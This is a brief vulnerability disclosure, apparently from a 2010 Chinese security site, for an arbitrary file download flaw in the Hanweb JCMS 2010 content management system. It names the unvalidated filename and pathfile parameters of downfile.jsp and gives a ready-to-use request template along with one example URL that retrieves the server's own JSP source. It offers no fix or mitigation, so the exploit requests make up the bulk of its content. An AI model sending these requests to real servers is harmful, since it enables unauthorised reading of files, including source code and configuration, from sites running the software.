JCMS 2010 file download vulnerability
|
来源:http://www.linux520.com/ 作者:Beach 发布时间:2010-11-25
|
|
##################################################################################################### |
#Title: JCMS 2010 File Download Vulnerability |
#Team: http://www.linux520.com/ |
#Vendor: http://www.hanweb.com/ |
##################################################################################################### |
In /module/download/downfile.jsp ,filename and pathfile didn't verify user's input |
So this vulnerability allows an attacker to download any files . |
##################################################################################################### |
http://server/module/download/downfile.jsp?filename=[file_name]&pathfile=[Path/Path/file_name] |
##################################################################################################### |
http://server/module/download/downfile.jsp?filename=downfile.jsp&pathfile=module/download/downfile.jsp |
##################################################################################################### |
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|